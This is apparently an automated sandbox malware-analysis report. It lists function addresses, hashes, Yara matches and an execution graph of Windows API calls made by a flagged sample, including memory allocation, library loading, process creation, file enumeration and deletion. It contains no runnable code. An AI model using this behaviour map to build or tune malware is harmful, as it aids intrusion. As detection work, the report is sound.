                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                  • Opcode ID: 5c7d235422a66f488d299de06dd2a628f3f8256f2a0dfb79140d956c4eb4763e
                                                                                                                                                  • Instruction ID: 6a1c70253d347fe36c499c9dc22a0572d32c3bfd17c2090056a58199876cfa93
                                                                                                                                                  • Opcode Fuzzy Hash: 5c7d235422a66f488d299de06dd2a628f3f8256f2a0dfb79140d956c4eb4763e
                                                                                                                                                  • Instruction Fuzzy Hash: E0E19C316087569FD726CF28C884B2ABBF0AB85718F140A1DF6A5CB2D1D774DA84CB52
                                                                                                                                                  Function 0183BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Resource at %p, xrefs: 01877B8E
                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01877B7F
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 01877BAC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                  • Opcode ID: 9d77171e277489cd6466c1b5445507e3882cc72a39731d7c0b8c5414460ad346
                                                                                                                                                  • Instruction ID: e70e4bb5f82a35603c672f1dd19d73a32466306183061eaa08cfae3305ff5c70
                                                                                                                                                  • Opcode Fuzzy Hash: 9d77171e277489cd6466c1b5445507e3882cc72a39731d7c0b8c5414460ad346
                                                                                                                                                  • Instruction Fuzzy Hash: 4A41D4713047069FD724DE2DC840B6AB7E5EF99720F140A1DFA5ADB680DB31EA05CB92
                                                                                                                                                  Function 0183B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0187728C
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01877294
                                                                                                                                                  • RTL: Resource at %p, xrefs: 018772A3
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 018772C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                  • Opcode ID: de1c687b5801b6d4328d1cb861ac84d444a0fbeb86db536852937e460e5c5e49
                                                                                                                                                  • Instruction ID: 3d43f4628cff6cf3230014b3ad0380f4cdcf3cd755c03b360da7abee9114c37b
                                                                                                                                                  • Opcode Fuzzy Hash: de1c687b5801b6d4328d1cb861ac84d444a0fbeb86db536852937e460e5c5e49
                                                                                                                                                  • Instruction Fuzzy Hash: 02411371700206ABC720DE29CC85F66B7A5FF94714F140619FA66EB280DB31EA52C7D1
                                                                                                                                                  Function 018B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                  • Opcode ID: fc84befe9f65b282780216f6e0de546cff02aca3d9c654cdebd83babac8a2ef2
                                                                                                                                                  • Instruction ID: 0304e0aac00d737d651a5ee1a3912e06fae77b245e1ac9ebac4b79ee349e6e36
                                                                                                                                                  • Opcode Fuzzy Hash: fc84befe9f65b282780216f6e0de546cff02aca3d9c654cdebd83babac8a2ef2
                                                                                                                                                  • Instruction Fuzzy Hash: 4B318472A012199FDB20DE2DCC80BEEB7F9EB44750F44055AE949E3200EB30AB458BA1
                                                                                                                                                  Function 01847D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-
                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                  • Instruction ID: 16b8bee1fe64caaf752099486a8fce251b4751ebada60b9f8e1509927acf0865
                                                                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                  • Instruction Fuzzy Hash: 0591B171E0021E9BEB24DF6DC880ABEBBA5FF45720F54461AE955E72C0EF349B408761
                                                                                                                                                  Function 01809126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $$@
                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                  • Opcode ID: 4131ee8efcb70f487cc04537e144ed6668b03d6befa63f2ad3d17f1594e00690
                                                                                                                                                  • Instruction ID: edfeba0cf8178264d4aefce5bf34fbe780d76d64a064d5afda95e1f3ea3a6657
                                                                                                                                                  • Opcode Fuzzy Hash: 4131ee8efcb70f487cc04537e144ed6668b03d6befa63f2ad3d17f1594e00690
                                                                                                                                                  • Instruction Fuzzy Hash: FD811C71D012699BDB768B58CC44BEAB7B9AB08714F0041DAEA1DF7281D7345F84CF61

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:2.3%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                  Total number of Nodes:3
                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                  execution_graph 13082 7cdfbfd 13083 7cdfc17 13082->13083 13084 7cdfc26 closesocket 13083->13084

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 07CDFBFD Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 7cdfbfd-7cdfc34 call 7cb72cd call 7ce07dd closesocket
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7c90000_UFUUPGsATdE.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: closesocket
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2781271927-0
                                                                                                                                                  • Opcode ID: 67ade5c413cab0fe30b3776136ae7f51ec797ba85e15013a3fedc732ade12a0b
                                                                                                                                                  • Instruction ID: 49003e37bd7eb381dc6dda3bf98f554bb4fc6854fc30fe50c92d50db0f29bdcc
                                                                                                                                                  • Opcode Fuzzy Hash: 67ade5c413cab0fe30b3776136ae7f51ec797ba85e15013a3fedc732ade12a0b
                                                                                                                                                  • Instruction Fuzzy Hash: 84E08C76240204BBC220EA6ACC40EEB73ACDFC9720F104429FE1CA7200C770B91187F2

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 07CBFD4D Relevance: 34.2, Strings: 27, Instructions: 454COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7c90000_UFUUPGsATdE.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: +$"$#$%$*$*B$2[=|$8h$=$=|$@3$A$BeO<$F$O<$Q+$V$W$Z$[O$^.$dS$ic$q$q$/$R
                                                                                                                                                  • API String ID: 0-1089640559
                                                                                                                                                  • Opcode ID: 78bb428ed5f27faa50f8cc867b22df85be3b75b3fa49112115873a28a8a84c86
                                                                                                                                                  • Instruction ID: f81d53fd41ff360f89fd959ed40b5b51ee899d359125dc0064bbbe8373a3994b
                                                                                                                                                  • Opcode Fuzzy Hash: 78bb428ed5f27faa50f8cc867b22df85be3b75b3fa49112115873a28a8a84c86
                                                                                                                                                  • Instruction Fuzzy Hash: 6542CEB0D05229CBEB29CF45CC997EDBBB1BB49308F1085D9C5196B280C7B95AC9CF85
                                                                                                                                                  Function 07CBA4BC Relevance: .0, Instructions: 16COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7c90000_UFUUPGsATdE.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: daa1e045191e9b45a62f2500c0c1d9288a73984b14017f085a11f08a35be8cc9
                                                                                                                                                  • Instruction ID: fe0eee64be3a46537613e77c74ab09542962012be67099453bbab32b7ea7c110
                                                                                                                                                  • Opcode Fuzzy Hash: daa1e045191e9b45a62f2500c0c1d9288a73984b14017f085a11f08a35be8cc9
                                                                                                                                                  • Instruction Fuzzy Hash: 69C08C22B4108100D2104DADBA84674EB64EB871A0F0023EBEC08EFA18E98AD4168249
                                                                                                                                                  Function 07CB9E2F Relevance: .0, Instructions: 11COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7c90000_UFUUPGsATdE.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: abfe4f3a26f0691c122adaedcdcc5cc470b387c5d87a27bca6c87cabdabea513
                                                                                                                                                  • Instruction ID: 8567c438cfd641213ad879da330cb65e95469eb12735bdf68a1ad5c2946eb252
                                                                                                                                                  • Opcode Fuzzy Hash: abfe4f3a26f0691c122adaedcdcc5cc470b387c5d87a27bca6c87cabdabea513
                                                                                                                                                  • Instruction Fuzzy Hash: 80B01220E8E048068E328D1014A14F8F730C98302CF0933C48C8837803E541C83341CF

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:2.6%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                                                  Signature Coverage:1.6%
                                                                                                                                                  Total number of Nodes:448
                                                                                                                                                  Total number of Limit Nodes:75
                                                                                                                                                  execution_graph 94960 7a24f0 94965 7b8ce0 94960->94965 94964 7a253b 94966 7b8cfd 94965->94966 94974 49a2c0a 94966->94974 94967 7a2526 94969 7b9750 94967->94969 94970 7b97e2 94969->94970 94971 7b977e 94969->94971 94977 49a2e80 LdrInitializeThunk 94970->94977 94971->94964 94972 7b9813 94972->94964 94975 49a2c1f LdrInitializeThunk 94974->94975 94976 49a2c11 94974->94976 94975->94967 94976->94967 94977->94972 95328 49a2ad0 LdrInitializeThunk 94978 7bc870 94981 7bb770 94978->94981 94984 7b9a40 94981->94984 94983 7bb789 94985 7b9a5d 94984->94985 94986 7b9a6e RtlFreeHeap 94985->94986 94986->94983 95344 7a8a37 95345 7a8a3a 95344->95345 95346 7a89f1 95345->95346 95348 7a72e0 95345->95348 95349 7a72f6 95348->95349 95351 7a732f 95348->95351 95349->95351 95352 7a7150 LdrLoadDll 95349->95352 95351->95346 95352->95351 95353 7a9e29 95354 7a9e40 95353->95354 95355 7a9e45 95353->95355 95356 7a9e79 95355->95356 95357 7bb770 RtlFreeHeap 95355->95357 95357->95356 94987 79b760 94990 7bb6e0 94987->94990 94989 79cdd1 94993 7b9820 94990->94993 94992 7bb711 94992->94989 94994 7b98b8 94993->94994 94996 7b984e 94993->94996 94995 7b98ce NtAllocateVirtualMemory 94994->94995 94995->94992 94996->94992 95358 799f20 95360 79a369 95358->95360 95359 79a801 95360->95359 95362 7bb3d0 95360->95362 95363 7bb3f6 95362->95363 95368 794120 95363->95368 95365 7bb402 95367 7bb43b 95365->95367 95371 7b57e0 95365->95371 95367->95359 95375 7a3450 95368->95375 95370 79412d 95370->95365 95372 7b5842 95371->95372 95374 7b584f 95372->95374 95386 7a1c30 95372->95386 95374->95367 95376 7a346a 95375->95376 95378 7a3483 95376->95378 95379 7ba120 95376->95379 95378->95370 95381 7ba13a 95379->95381 95380 7ba169 95380->95378 95381->95380 95382 7b8ce0 LdrInitializeThunk 95381->95382 95383 7ba1c6 95382->95383 95384 7bb770 RtlFreeHeap 95383->95384 95385 7ba1dc 95384->95385 95385->95378 95387 7a1c6b 95386->95387 95402 7a80a0 95387->95402 95389 7a1c73 95390 7bb850 RtlAllocateHeap 95389->95390 95401 7a1f46 95389->95401 95391 7a1c89 95390->95391 95392 7bb850 RtlAllocateHeap 95391->95392 95393 7a1c9a 95392->95393 95394 7bb850 RtlAllocateHeap 95393->95394 95397 7a1cab 95394->95397 95395 7a1d42 95398 7a4780 LdrLoadDll 95395->95398 95397->95395 95417 7a6c50 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 95397->95417 95399 7a1ef2 95398->95399 95413 7b8120 95399->95413 95401->95374 95403 7a80cc 95402->95403 95404 7a7f90 2 API calls 95403->95404 95405 7a80ef 95404->95405 95406 7a80f9 95405->95406 95407 7a8111 95405->95407 95408 7a8104 95406->95408 95410 7b96c0 NtClose 95406->95410 95409 7a812d 95407->95409 95411 7b96c0 NtClose 95407->95411 95408->95389 95409->95389 95410->95408 95412 7a8123 95411->95412 95412->95389 95414 7b8182 95413->95414 95416 7b818f 95414->95416 95418 7a1f60 95414->95418 95416->95401 95417->95395 95437 7a8370 95418->95437 95420 7a24e0 95420->95416 95421 7a1f80 95421->95420 95441 7b1360 95421->95441 95424 7a2192 95426 7bc940 2 API calls 95424->95426 95425 7a1fdb 95425->95420 95444 7bc810 95425->95444 95429 7a21a7 95426->95429 95427 7a8310 LdrInitializeThunk 95430 7a21f7 95427->95430 95429->95430 95431 7a2346 95429->95431 95449 7b5870 95429->95449 95430->95420 95430->95427 95434 7b5870 2 API calls 95430->95434 95435 7a0a90 LdrInitializeThunk 95430->95435 95453 7a0a90 95431->95453 95433 7a2350 95433->95430 95436 7a8310 LdrInitializeThunk 95433->95436 95434->95430 95435->95430 95436->95433 95438 7a837d 95437->95438 95439 7a839e SetErrorMode 95438->95439 95440 7a83a5 95438->95440 95439->95440 95440->95421 95442 7bb6e0 NtAllocateVirtualMemory 95441->95442 95443 7b1381 95442->95443 95443->95425 95445 7bc820 95444->95445 95446 7bc826 95444->95446 95445->95424 95447 7bb850 RtlAllocateHeap 95446->95447 95448 7bc84c 95447->95448 95448->95424 95450 7b58d1 95449->95450 95452 7b58f2 95450->95452 95457 7a5e70 95450->95457 95452->95429 95454 7a0a9d 95453->95454 95462 7b9950 95454->95462 95458 7a5eba 95457->95458 95461 7a5e16 95457->95461 95458->95452 95459 7a8290 2 API calls 95459->95461 95460 7a5e3c 95460->95452 95461->95459 95461->95460 95463 7b996a 95462->95463 95466 49a2c70 LdrInitializeThunk 95463->95466 95464 7a0ab2 95464->95433 95466->95464 94997 7a7360 94998 7a737c 94997->94998 95006 7a73cf 94997->95006 94998->95006 95007 7b96c0 94998->95007 94999 7a7504 95001 7a7397 95010 7a6780 NtClose LdrInitializeThunk LdrInitializeThunk 95001->95010 95003 7a74de 95003->94999 95012 7a6950 NtClose LdrInitializeThunk LdrInitializeThunk 95003->95012 95006->94999 95011 7a6780 NtClose LdrInitializeThunk LdrInitializeThunk 95006->95011 95008 7b96dd 95007->95008 95009 7b96ee NtClose 95008->95009 95009->95001 95010->95006 95011->95003 95012->94999 95013 7aaf60 95018 7aac70 95013->95018 95015 7aaf6d 95032 7aa8f0 95015->95032 95017 7aaf89 95019 7aac95 95018->95019 95043 7a8580 95019->95043 95022 7aade3 95022->95015 95024 7aadfa 95024->95015 95025 7aadf1 95025->95024 95027 7aaee7 95025->95027 95062 7aa340 95025->95062 95029 7aaf4a 95027->95029 95071 7aa6b0 95027->95071 95030 7bb770 RtlFreeHeap 95029->95030 95031 7aaf51 95030->95031 95031->95015 95033 7aa903 95032->95033 95040 7aa90e 95032->95040 95034 7bb850 RtlAllocateHeap 95033->95034 95034->95040 95035 7aa92f 95035->95017 95036 7a8580 GetFileAttributesW 95036->95040 95037 7aac42 95038 7aac58 95037->95038 95039 7bb770 RtlFreeHeap 95037->95039 95038->95017 95039->95038 95040->95035 95040->95036 95040->95037 95041 7aa340 RtlFreeHeap 95040->95041 95042 7aa6b0 RtlFreeHeap 95040->95042 95041->95040 95042->95040 95044 7a85a1 95043->95044 95045 7a85a8 GetFileAttributesW 95044->95045 95046 7a85b3 95044->95046 95045->95046 95046->95022 95047 7b3540 95046->95047 95048 7b354e 95047->95048 95049 7b3555 95047->95049 95048->95025 95075 7a4780 95049->95075 95051 7b358a 95054 7b3599 95051->95054 95083 7b3010 LdrLoadDll 95051->95083 95058 7b3744 95054->95058 95080 7bb850 95054->95080 95055 7b35b2 95056 7b373a 95055->95056 95055->95058 95060 7b35ce 95055->95060 95057 7bb770 RtlFreeHeap 95056->95057 95056->95058 95057->95058 95058->95025 95059 7bb770 RtlFreeHeap 95061 7b372e 95059->95061 95060->95058 95060->95059 95061->95025 95063 7aa366 95062->95063 95087 7add70 95063->95087 95065 7aa3d8 95067 7aa55a 95065->95067 95068 7aa3f6 95065->95068 95066 7aa53f 95066->95025 95067->95066 95070 7aa200 RtlFreeHeap 95067->95070 95068->95066 95092 7aa200 95068->95092 95070->95067 95072 7aa6d6 95071->95072 95073 7add70 RtlFreeHeap 95072->95073 95074 7aa75d 95073->95074 95074->95027 95077 7a47a4 95075->95077 95076 7a47ab 95076->95051 95077->95076 95078 7a47e0 LdrLoadDll 95077->95078 95079 7a47f7 95077->95079 95078->95079 95079->95051 95084 7b99f0 95080->95084 95082 7bb86b 95082->95055 95083->95054 95085 7b9a0d 95084->95085 95086 7b9a1e RtlAllocateHeap 95085->95086 95086->95082 95088 7add94 95087->95088 95089 7adda1 95088->95089 95090 7bb770 RtlFreeHeap 95088->95090 95089->95065 95091 7adde4 95090->95091 95091->95065 95093 7aa21d 95092->95093 95096 7ade00 95093->95096 95095 7aa323 95095->95068 95098 7ade24 95096->95098 95097 7adece 95097->95095 95098->95097 95099 7bb770 RtlFreeHeap 95098->95099 95099->95097 95100 7a75e1 95101 7a75a3 95100->95101 95104 7ab490 95101->95104 95103 7a75b2 95105 7ab4b6 95104->95105 95106 7ab6e9 95105->95106 95131 7b9ad0 95105->95131 95106->95103 95108 7ab52c 95108->95106 95134 7bc940 95108->95134 95110 7ab54b 95110->95106 95111 7ab622 95110->95111 95112 7b8ce0 LdrInitializeThunk 95110->95112 95113 7a5d60 LdrInitializeThunk 95111->95113 95116 7ab641 95111->95116 95114 7ab5ad 95112->95114 95113->95116 95114->95111 95120 7ab5b6 95114->95120 95115 7ab60a 95143 7a8310 95115->95143 95117 7ab6d1 95116->95117 95147 7b8850 95116->95147 95124 7a8310 LdrInitializeThunk 95117->95124 95119 7ab5e8 95162 7b4960 LdrInitializeThunk 95119->95162 95120->95106 95120->95115 95120->95119 95140 7a5d60 95120->95140 95127 7ab6df 95124->95127 95126 7ab6a8 95152 7b8900 95126->95152 95127->95103 95129 7ab6c2 95157 7b8a60 95129->95157 95132 7b9aed 95131->95132 95133 7b9afe CreateProcessInternalW 95132->95133 95133->95108 95135 7bc8b0 95134->95135 95136 7bb850 RtlAllocateHeap 95135->95136 95137 7bc90d 95135->95137 95138 7bc8ea 95136->95138 95137->95110 95139 7bb770 RtlFreeHeap 95138->95139 95139->95137 95163 7b8eb0 95140->95163 95142 7a5d9e 95142->95119 95144 7a8323 95143->95144 95169 7b8be0 95144->95169 95146 7a834e 95146->95103 95148 7b88cd 95147->95148 95149 7b887b 95147->95149 95175 49a39b0 LdrInitializeThunk 95148->95175 95149->95126 95150 7b88f2 95150->95126 95153 7b897d 95152->95153 95154 7b892b 95152->95154 95176 49a4340 LdrInitializeThunk 95153->95176 95154->95129 95155 7b89a2 95155->95129 95158 7b8ae0 95157->95158 95159 7b8a8e 95157->95159 95177 49a2fb0 LdrInitializeThunk 95158->95177 95159->95117 95160 7b8b05 95160->95117 95162->95115 95164 7b8f61 95163->95164 95166 7b8edf 95163->95166 95168 49a2d10 LdrInitializeThunk 95164->95168 95165 7b8fa6 95165->95142 95166->95142 95168->95165 95170 7b8c5e 95169->95170 95172 7b8c0b 95169->95172 95174 49a2dd0 LdrInitializeThunk 95170->95174 95171 7b8c83 95171->95146 95172->95146 95174->95171 95175->95150 95176->95155 95177->95160 95467 7b1d20 95472 7b1d39 95467->95472 95468 7b1dc6 95469 7b1d81 95470 7bb770 RtlFreeHeap 95469->95470 95471 7b1d91 95470->95471 95472->95468 95472->95469 95473 7b1dc1 95472->95473 95474 7bb770 RtlFreeHeap 95473->95474 95474->95468 95475 7b93a0 95476 7b9457 95475->95476 95478 7b93cf 95475->95478 95477 7b946d NtCreateFile 95476->95477 95178 7a5e66 95179 7a5df7 95178->95179 95180 7a8310 LdrInitializeThunk 95179->95180 95181 7a5e10 95179->95181 95180->95181 95183 7a5e3c 95181->95183 95184 7a8290 95181->95184 95185 7a82d4 95184->95185 95186 7a82f5 95185->95186 95191 7b89b0 95185->95191 95186->95181 95188 7a82e5 95189 7a8301 95188->95189 95190 7b96c0 NtClose 95188->95190 95189->95181 95190->95186 95192 7b8a30 95191->95192 95194 7b89de 95191->95194 95196 49a4650 LdrInitializeThunk 95192->95196 95193 7b8a55 95193->95188 95194->95188 95196->95193 95197 7a105b PostThreadMessageW 95198 7a106d 95197->95198 95199 7a3353 95204 7a7f90 95199->95204 95202 7b96c0 NtClose 95203 7a337f 95202->95203 95205 7a7faa 95204->95205 95209 7a3363 95204->95209 95210 7b8d80 95205->95210 95208 7b96c0 NtClose 95208->95209 95209->95202 95209->95203 95211 7b8d9d 95210->95211 95214 49a35c0 LdrInitializeThunk 95211->95214 95212 7a807a 95212->95208 95214->95212 95479 7ac810 95481 7ac839 95479->95481 95480 7ac93d 95481->95480 95482 7ac8e3 FindFirstFileW 95481->95482 95482->95480 95484 7ac8fe 95482->95484 95483 7ac924 FindNextFileW 95483->95484 95485 7ac936 FindClose 95483->95485 95484->95483 95485->95480 95215 7b6250 95216 7b62aa 95215->95216 95218 7b62b7 95216->95218 95219 7b3c60 95216->95219 95220 7b3c63 95219->95220 95221 7bb6e0 NtAllocateVirtualMemory 95220->95221 95223 7b3ca1 95221->95223 95222 7b3dae 95222->95218 95223->95222 95224 7a4780 LdrLoadDll 95223->95224 95227 7b3ce7 95224->95227 95225 7b3d30 Sleep 95225->95227 95227->95222 95227->95225 95228 7b61b0 LdrLoadDll Sleep NtAllocateVirtualMemory 95227->95228 95228->95227 95487 7b9510 95488 7b95ba 95487->95488 95490 7b953e 95487->95490 95489 7b95d0 NtReadFile 95488->95489 95491 7b9610 95492 7b968a 95491->95492 95494 7b963e 95491->95494 95493 7b96a0 NtDeleteFile 95492->95493 95495 7b8c90 95496 7b8caa 95495->95496 95499 49a2df0 LdrInitializeThunk 95496->95499 95497 7b8cd2 95499->95497 95500 7b8b10 95501 7b8ba2 95500->95501 95502 7b8b3e 95500->95502 95505 49a2ee0 LdrInitializeThunk 95501->95505 95503 7b8bd3 95505->95503 95506 7b1990 95507 7b19ac 95506->95507 95508 7b19e8 95507->95508 95509 7b19d4 95507->95509 95510 7b96c0 NtClose 95508->95510 95511 7b96c0 NtClose 95509->95511 95513 7b19f1 95510->95513 95512 7b19dd 95511->95512 95516 7bb890 RtlAllocateHeap 95513->95516 95515 7b19fc 95516->95515 95229 7a29d7 95232 7a64f0 95229->95232 95231 7a29f0 95233 7a6523 95232->95233 95234 7a6547 95233->95234 95239 7b9200 95233->95239 95234->95231 95236 7a656a 95236->95234 95237 7b96c0 NtClose 95236->95237 95238 7a65ea 95237->95238 95238->95231 95240 7b921a 95239->95240 95243 49a2ca0 LdrInitializeThunk 95240->95243 95241 7b9246 95241->95236 95243->95241 95244 799ec0 95246 799ecf 95244->95246 95245 799f10 95246->95245 95247 799efd CreateThread 95246->95247 95248 7afa40 95249 7afaa4 95248->95249 95250 7a64f0 2 API calls 95249->95250 95252 7afbd7 95250->95252 95251 7afbde 95252->95251 95277 7a6600 95252->95277 95254 7afd83 95255 7afc5a 95255->95254 95256 7afd92 95255->95256 95281 7af820 95255->95281 95257 7b96c0 NtClose 95256->95257 95259 7afd9c 95257->95259 95260 7afc96 95260->95256 95261 7afca1 95260->95261 95262 7bb850 RtlAllocateHeap 95261->95262 95263 7afcca 95262->95263 95264 7afce9 95263->95264 95265 7afcd3 95263->95265 95290 7af710 CoInitialize 95264->95290 95266 7b96c0 NtClose 95265->95266 95268 7afcdd 95266->95268 95269 7afcf7 95293 7b9160 95269->95293 95271 7afd72 95272 7b96c0 NtClose 95271->95272 95273 7afd7c 95272->95273 95274 7bb770 RtlFreeHeap 95273->95274 95274->95254 95275 7afd15 95275->95271 95276 7b9160 LdrInitializeThunk 95275->95276 95276->95275 95278 7a6625 95277->95278 95297 7b9000 95278->95297 95282 7af83c 95281->95282 95283 7a4780 LdrLoadDll 95282->95283 95285 7af85a 95283->95285 95284 7af863 95284->95260 95285->95284 95286 7a4780 LdrLoadDll 95285->95286 95287 7af92e 95286->95287 95288 7a4780 LdrLoadDll 95287->95288 95289 7af988 95287->95289 95288->95289 95289->95260 95292 7af775 95290->95292 95291 7af80b CoUninitialize 95291->95269 95292->95291 95294 7b917a 95293->95294 95302 49a2ba0 LdrInitializeThunk 95294->95302 95295 7b91aa 95295->95275 95298 7b901d 95297->95298 95301 49a2c60 LdrInitializeThunk 95298->95301 95299 7a6699 95299->95255 95301->95299 95302->95295 95303 7a7540 95304 7a75b2 95303->95304 95305 7a7558 95303->95305 95305->95304 95306 7ab490 9 API calls 95305->95306 95306->95304 95307 7a6fc0 95308 7a6fea 95307->95308 95311 7a8140 95308->95311 95310 7a7014 95312 7a815d 95311->95312 95318 7b8dd0 95312->95318 95314 7a81ad 95315 7a81b4 95314->95315 95316 7b8eb0 LdrInitializeThunk 95314->95316 95315->95310 95317 7a81dd 95316->95317 95317->95310 95319 7b8e6e 95318->95319 95321 7b8dfe 95318->95321 95323 49a2f30 LdrInitializeThunk 95319->95323 95320 7b8ea7 95320->95314 95321->95314 95323->95320 95324 7b0340 95325 7b0363 95324->95325 95326 7a4780 LdrLoadDll 95325->95326 95327 7b0387 95326->95327

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 007AC810 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 007AC8F4
                                                                                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 007AC92F
